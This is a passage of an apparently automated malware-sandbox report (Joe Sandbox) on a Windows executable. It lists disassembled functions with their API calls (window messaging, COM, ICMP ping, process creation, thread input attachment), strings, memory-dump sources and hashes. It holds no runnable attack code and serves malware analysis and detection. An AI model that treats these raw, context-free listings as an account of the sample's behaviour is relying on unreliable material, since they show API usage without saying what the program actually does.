                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: static
                                                                                        • API String ID: 2559357485-2160076837
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00426E3E
                                                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                        • __gmtime64_s.LIBCMT ref: 00426ED7
                                                                                        • __gmtime64_s.LIBCMT ref: 00426F0D
                                                                                        • __gmtime64_s.LIBCMT ref: 00426F2A
                                                                                        • __allrem.LIBCMT ref: 00426F80
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                                                        • __allrem.LIBCMT ref: 00426FB3
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                                                        • __allrem.LIBCMT ref: 00426FE8
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                                                        • __invoke_watson.LIBCMT ref: 00427077
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                        • String ID:
                                                                                        • API String ID: 384356119-0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00462542
                                                                                        • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                                                                        • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                                                                        • Sleep.KERNEL32(000001F4), ref: 004625EB
                                                                                        • GetMenuItemCount.USER32(?), ref: 0046262F
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                                                                        • GetMenuItemID.USER32(?,?), ref: 004626BA
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4176008265-0
                                                                                        • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                        • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                                                                        • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                        • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                                                                        • _memset.LIBCMT ref: 00486FDD
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 830647256-0
                                                                                        • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                        • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                                                                        • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                        • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                                                                        • VariantInit.OLEAUT32(?), ref: 00456C2A
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                                                                        • VariantClear.OLEAUT32(?), ref: 00456CC6
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                                                                        • VariantClear.OLEAUT32(?), ref: 00456CEE
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                        • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                                                                        • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                        • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                                                                        APIs
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • CoInitialize.OLE32 ref: 00478403
                                                                                        • CoUninitialize.OLE32 ref: 0047840E
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                                                                        • IIDFromString.OLE32(?,?), ref: 004784E1
                                                                                        • VariantInit.OLEAUT32(?), ref: 0047857B
                                                                                        • VariantClear.OLEAUT32(?), ref: 004785DC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 834269672-1287834457
                                                                                        • Opcode ID: c04c75621ce49cc5f6b0995f70e74a0e3f94a869c5641639a45c403aad8c8130
                                                                                        • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                                                                                        • Opcode Fuzzy Hash: c04c75621ce49cc5f6b0995f70e74a0e3f94a869c5641639a45c403aad8c8130
                                                                                        • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                                                                        APIs
                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00475793
                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 004757D8
                                                                                        • gethostbyname.WSOCK32(?), ref: 004757E4
                                                                                        • IcmpCreateFile.IPHLPAPI ref: 004757F2
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475862
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475878
                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004758ED
                                                                                        • WSACleanup.WSOCK32 ref: 004758F3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        • Opcode ID: 8c1f62a028f67a861641f920bff49acae339ba4ee59605ba5ff9b7a17a6566e8
                                                                                        • Instruction ID: e00705f4e0379358c1930da5d1710ca1d0dba9501fb2cabd0d468b8ffa352f64
                                                                                        • Opcode Fuzzy Hash: 8c1f62a028f67a861641f920bff49acae339ba4ee59605ba5ff9b7a17a6566e8
                                                                                        • Instruction Fuzzy Hash: 08519F716006009FD710AF25DC45B6A77E4EF48714F05892EF95AEB3A1DB78EC14CB4A
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                                                                        • GetLastError.KERNEL32 ref: 0046B550
                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                        • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                                                                        • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                        • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                                                                        • GetDlgCtrlID.USER32 ref: 0045901F
                                                                                        • GetParent.USER32 ref: 0045903B
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00459047
                                                                                        • GetParent.USER32(?), ref: 00459063
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1536045017-1403004172
                                                                                        • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                        • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                                                        • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                        • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                                                        • GetDlgCtrlID.USER32 ref: 00459108
                                                                                        • GetParent.USER32 ref: 00459124
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00459130
                                                                                        • GetParent.USER32(?), ref: 0045914C
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1536045017-1403004172
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 0045916F
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                                                        • _wcscmp.LIBCMT ref: 00459196
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-3381328864
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2156557900-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                        • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                        • API String ID: 2862541840-2080382077
                                                                                        APIs
                                                                                        • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ChildEnumWindows
                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                        • API String ID: 3555792229-1603158881
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                                                          • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                                                          • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                                                          • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                                                        • GetDC.USER32 ref: 0043CD32
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: U
                                                                                        • API String ID: 4009187628-3372436214
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00478F00
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                        • String ID:
                                                                                        • API String ID: 560350794-0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0047F6B5
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
                                                                                        • CloseHandle.KERNEL32(?), ref: 0047FAAB
                                                                                        • CloseHandle.KERNEL32(?), ref: 0047FB22
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4090791747-0
                                                                                        APIs
                                                                                          • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                          • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                          • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                                                                        • _wcscmp.LIBCMT ref: 00464D5A
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 793581249-0
                                                                                        • Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                        • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                                                                        • Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                        • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                        • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                                                                        • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                        • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                                                                        • DestroyIcon.USER32(00000000), ref: 0043C37F
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                                                                        • DestroyIcon.USER32(?), ref: 0043C3AB
                                                                                          • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                        • String ID:
                                                                                        • API String ID: 2819616528-0
                                                                                        • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                        • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                                                                        • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                        • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                                                                        APIs
                                                                                          • Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
                                                                                          • Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
                                                                                          • Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
